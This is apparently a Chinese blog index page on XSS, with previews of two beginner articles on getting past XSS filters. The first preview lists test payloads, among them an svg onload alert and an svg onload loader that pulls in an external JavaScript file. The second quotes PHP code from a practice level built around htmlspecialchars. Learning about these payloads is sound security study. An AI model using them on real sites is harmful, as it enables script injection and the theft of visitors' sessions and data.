![](https://img-blog.csdnimg.cn/20201014180756754.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
XSS
文章平均质量分 81
nigo134
菜鸡一个,入门web安全 、、、
展开
-
XSS绕过姿势总结
0x00 XSS基本测试流程原则是“见框就插”,多动手,这里分享几个经典测试payload:"><svg/onload=alert(1)//具体引用外部js的代码姿势是:<svg/onload=s=createElement('script');body.appendChild(s);s.src='js地址'//在火狐浏览器下查看的效果(浏览器解析时会自动加上引号):<a href="javascript:alert(1)" >click me原创 2021-07-16 22:14:43 · 1591 阅读 · 0 评论 -
xss总结
1.通过拼接html标签绕过htmlspecialchars()ini_set("display_errors", 0);$str = $_GET["keyword"];echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center><form action=level2.php method=GET><input name=keyword val.原创 2021-07-16 20:57:18 · 434 阅读 · 0 评论